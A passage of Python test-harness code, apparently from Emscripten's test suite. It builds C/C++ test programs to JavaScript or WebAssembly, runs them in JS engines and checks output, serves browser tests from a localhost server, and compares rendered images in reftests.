if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not DEBUG:
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key, default=None):
return self.settings_mods.get(key, default)
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret.append(f'-s{key}')
elif type(value) == list:
ret.append(f'-s{key}={",".join(value)}')
else:
ret.append(f'-s{key}={value}')
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
def verify_es5(self, filename):
es_check = shared.get_npm_cmd('es-check')
# use --quiet once it's available
# See: https://github.com/dollarshaveclub/es-check/pull/126/
es_check_env = os.environ.copy()
es_check_env['PATH'] = os.path.dirname(config.NODE_JS[0]) + os.pathsep + es_check_env['PATH']
try:
# Comment out --quiet if more detailed error logging is needed
shared.run_process(es_check + ['es5', os.path.abspath(filename), '--quiet'], stderr=PIPE, env=es_check_env)
except subprocess.CalledProcessError as e:
print(e.stderr)
self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=[], includes=[], force_c=False, js_outfile=True, emcc_args=[], output_basename=None):
suffix = '.js' if js_outfile else '.wasm'
compiler = [compiler_for(filename, force_c)]
if compiler[0] == EMCC:
# TODO(https://github.com/emscripten-core/emscripten/issues/11121)
# We link with C++ stdlibs even when linking with emcc, for historical reasons. We can remove
# this once that issue is fixed.
compiler.append('-nostdlib++')
if force_c:
compiler.append('-xc')
if output_basename:
output = output_basename + suffix
else:
basename = os.path.basename(filename)
output = shared.unsuffixed(basename) + suffix
cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + emcc_args + libraries
if shared.suffix(filename) not in ('.i', '.ii'):
# Add the location of the test file to include path.
cmd += ['-I.']
cmd += ['-I' + str(include) for include in includes]
self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(output)
if js_outfile and not self.uses_es6:
self.verify_es5(output)
if js_outfile and self.uses_memory_init_file():
src = read_file(output)
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
return output
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
js = read_file(javascript_file)
blob = "".join(js.splitlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_js(self, filename, engine=None, args=[],
output_nicerizer=None,
assert_returncode=0,
interleaved_output=True):
# use files, as PIPE can get too full and hang us
stdout_file = self.in_dir('stdout')
stderr_file = None
if interleaved_output:
stderr = STDOUT
else:
stderr_file = self.in_dir('stderr')
stderr = open(stderr_file, 'w')
error = None
if not engine:
engine = self.js_engines[0]
if engine == config.NODE_JS:
engine = engine + self.node_args
if engine == config.V8_ENGINE:
engine = engine + self.v8_args
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout_file, 'w'),
stderr=stderr,
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
ret = read_file(stdout_file)
if not interleaved_output:
ret += read_file(stderr_file)
if output_nicerizer:
ret = output_nicerizer(ret)
if error or EMTEST_VERBOSE:
ret = limit_size(ret)
print('-- begin program output --')
print(read_file(stdout_file), end='')
print('-- end program output --')
if not interleaved_output:
print('-- begin program stderr --')
print(read_file(stderr_file), end='')
print('-- end program stderr --')
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(read_binary(file1),
read_binary(file2))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init=None, cache_name_extra='', native=False):
if env_init is None:
env_init = {}
if make_args is None:
make_args = ['-j', str(shared.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
write_binary(bc_file, contents)
generated_libs.append(bc_file)
return generated_libs
print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
if configure is not None:
# Avoid += so we don't mutate the default arg
configure = configure + configure_args
cflags = ' '.join(self.get_emcc_args())
env_init.setdefault('CFLAGS', cflags)
env_init.setdefault('CXXFLAGS', cflags)
return build_library(name, build_dir, output_dir, generated_libs, configure,
make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native)
def clear(self):
delete_contents(self.get_dir())
if EMSCRIPTEN_TEMP_DIR:
delete_contents(EMSCRIPTEN_TEMP_DIR)
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than erroring.
# In the long run it would be nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
print(e.stdout)
print(e.stderr)
self.fail(f'subprocess exited with non-zero return code({e.returncode}): `{shared.shlex_join(cmd)}`')
def emcc(self, filename, args=[], output_filename=None, **kwargs):
if output_filename is None:
output_filename = filename + '.o'
try_delete(output_filename)
self.run_process([compiler_for(filename), filename] + args + ['-o', output_filename], **kwargs)
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
# exercise the dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under the browser it exercises how the dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_file('libb.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc() {
afunc("b");
}
''')
create_file('libc.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', '32mb')
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so, '-s', 'SIDE_MODULE'] + self.get_emcc_args()
cmdv += linkto
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.c', ['liba' + so])
ccshared('libc.c', ['liba' + so])
self.set_setting('MAIN_MODULE')
extra_args = ['-L.', 'libb' + so, 'libc' + so]
do_run(r'''
#ifdef __cplusplus
extern "C" {
#endif
void bfunc();
void cfunc();
#ifdef __cplusplus
}
#endif
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n', emcc_args=extra_args)
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc_ptr)(), (*cfunc_ptr)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(cdso != NULL);
bfunc_ptr = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc_ptr != NULL);
cfunc_ptr = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc_ptr != NULL);
bfunc_ptr();
cfunc_ptr();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = self.js_engines
for engine in js_engines:
assert engine in config.JS_ENGINES, "js engine does not exist in config.JS_ENGINES"
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run(self, src, expected_output, force_c=False, **kwargs):
if 'no_build' in kwargs:
filename = src
else:
if force_c:
filename = 'src.c'
else:
filename = 'src.cpp'
write_file(filename, src)
self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
self._build_and_run(filename, read_file(expected_output_filename), **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
srcfile = test_file(*path)
out_suffix = kwargs.pop('out_suffix', '')
outfile = shared.unsuffixed(srcfile) + out_suffix + '.out'
expected = read_file(outfile)
self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
no_build=False,
js_engines=None, libraries=[],
includes=[],
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True, force_c=False, emcc_args=[],
interleaved_output=True,
output_basename=None):
logger.debug(f'_build_and_run: {filename}')
if no_build:
js_file = filename
else:
js_file = self.build(filename, libraries=libraries, includes=includes,
force_c=force_c, emcc_args=emcc_args,
output_basename=output_basename)
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
if len(engines) > 1 and not self.use_all_engines:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
if not self.wasm_engines:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += self.wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.replace_suffix(js_file, '.wasm.c')
executable = shared.replace_suffix(js_file, '.exe')
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % config.EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args,
output_nicerizer=output_nicerizer,
assert_returncode=assert_returncode,
interleaved_output=interleaved_output)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + test_file('third_party/freetype/include'),
'-I' + test_file('third_party/poppler/include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=['cmake', '.'],
make=['cmake', '--build', '.'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(read_binary(test_file('browser_harness.html')))
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url.encode('utf-8'))
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class Reporting(Enum):
"""When running browser tests we normally automatically include support
code for reporting results back to the browser. This enum allows tests
to decide what type of support code they need/want.
"""
NONE = 0
# Include the JS helpers for reporting results
JS_ONLY = 1
# Include C/C++ reporting code (REPORT_RESULT macros) as well as JS helpers
FULL = 2
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
'http://localhost:%s/%s' % (self.port, html_file),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
output = unquote(output)
try:
self.assertContained(expectedResult, output)
except Exception as e:
if extra_tries > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
reporting = read_file(test_file('browser_reporting.js'))
write_file('reftest.js', '''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
